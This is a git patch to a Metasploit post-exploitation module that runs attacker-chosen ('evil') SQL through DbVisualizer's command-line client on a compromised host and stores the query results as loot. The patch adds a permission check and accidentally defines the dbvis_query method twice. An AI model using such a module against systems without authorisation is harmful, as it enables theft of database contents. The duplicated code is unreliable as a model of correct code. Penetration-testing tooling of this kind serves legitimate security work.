From 200c122ecd4453827380d24da3f49b05fe51e54b Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Wed, 16 Jul 2014 18:48:15 +0200
Subject: [PATCH] Update dbvis_query.rb

---
 modules/post/multi/manage/dbvis_query.rb | 64 ++++++++++++++++++------
 1 file changed, 48 insertions(+), 16 deletions(-)

diff --git a/modules/post/multi/manage/dbvis_query.rb b/modules/post/multi/manage/dbvis_query.rb
index 56825b4df3..cf19243d77 100644
--- a/modules/post/multi/manage/dbvis_query.rb
+++ b/modules/post/multi/manage/dbvis_query.rb
@@ -177,27 +177,59 @@ class Metasploit3 < Msf::Post
     return dbvis
   end
 
+
   # Query execution method
   def dbvis_query(dbvis,sql)
     error =false
     resp=''
     if file?(dbvis)==true
-      print_status("Trying to execute evil sql, it can take time ...")
-      args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
-      dbvis ="\"#{dbvis}\""
-      cmd = "#{dbvis} #{args}"
-      resp = cmd_exec(cmd)
-      print_line("")
-      print_line("#{resp}")
-      # store qury and result
-      p = store_loot(
-        "dbvis.query",
-        "text/plain",
-        session,
-        resp.to_s,
-        "dbvis_query.txt",
-        "dbvis query")
-      print_good("Query stored in: #{p.to_s}")
+      f = session.fs.file.stat(dbvis)
+      if f.uid == Process.euid or Process.groups.include?f.gid
+        print_status("Trying to execute evil sql, it can take time ...")
+        args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
+        dbvis ="\"#{dbvis}\""
+        cmd = "#{dbvis} #{args}"
+        resp = cmd_exec(cmd)
+        vprint_line("")
+        vprint_status("#{resp}")
+        if resp =~ /denied|failed/i
+          error = true
+        end
+      else
+         print_error("User doesn't have enough rights to execute dbviscmd, aborting")
+      end
+    else
+      print_error("#{dbvis} is not a file")
+    end
+    return error
+  end
+
+  # Query execution method
+  def dbvis_query(dbvis,sql)
+    error =false
+    resp=''
+    if file?(dbvis)==true
+      f = session.fs.file.stat(dbvis)
+      if f.uid == Process.euid or Process.groups.include?f.gid
+        print_status("Trying to execute evil sql, it can take time ...")
+        args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
+        dbvis ="\"#{dbvis}\""
+        cmd = "#{dbvis} #{args}"
+        resp = cmd_exec(cmd)
+        print_line("")
+        print_line("#{resp}")
+        # store qury and result
+        p = store_loot(
+          "dbvis.query",
+          "text/plain",
+          session,
+          resp.to_s,
+          "dbvis_query.txt",
+          "dbvis query")
+        print_good("Query stored in: #{p.to_s}")
+      else
+        print_error("User doesn't have enough rights to execute dbviscmd, aborting")
+      end
     else
       print_error("#{dbvis} is not a file")
     end